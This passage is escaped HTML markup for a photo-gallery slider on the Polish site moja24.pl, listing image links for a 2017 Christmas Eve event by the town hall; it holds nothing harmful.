data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41.jpg\" title=\"wigilia przy ratuszu 2017 (41)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40.jpg\" title=\"wigilia przy ratuszu 2017 (40)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39.jpg\" title=\"wigilia przy ratuszu 2017 (39)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38.jpg\" title=\"wigilia przy ratuszu 2017 (38)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37.jpg\" title=\"wigilia przy ratuszu 2017 (37)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36.jpg\" title=\"wigilia przy ratuszu 2017 (36)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35.jpg\" title=\"wigilia przy ratuszu 2017 (35)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33.jpg\" title=\"wigilia przy ratuszu 2017 (33)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item21\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32.jpg\" title=\"wigilia przy ratuszu 2017 (32)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item22\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31.jpg\" title=\"wigilia przy ratuszu 2017 (31)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item23\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30.jpg\" title=\"wigilia przy ratuszu 2017 (30)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item24\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29.jpg\" title=\"wigilia przy ratuszu 2017 (29)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item25\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28.jpg\" title=\"wigilia przy ratuszu 2017 (28)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item26\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27.jpg\" title=\"wigilia przy ratuszu 2017 (27)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item27\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26.jpg\" title=\"wigilia przy ratuszu 2017 (26)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item28\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25.jpg\" title=\"wigilia przy ratuszu 2017 (25)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item29\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24.jpg\" title=\"wigilia przy ratuszu 2017 (24)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item30\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23.jpg\" title=\"wigilia przy ratuszu 2017 (23)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item31\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22.jpg\" title=\"wigilia przy ratuszu 2017 (22)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item32\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21.jpg\" title=\"wigilia przy ratuszu 2017 (21)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item33\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20.jpg\" title=\"wigilia przy ratuszu 2017 (20)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item34\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19.jpg\" title=\"wigilia przy ratuszu 2017 (19)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item35\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18.jpg\" title=\"wigilia przy ratuszu 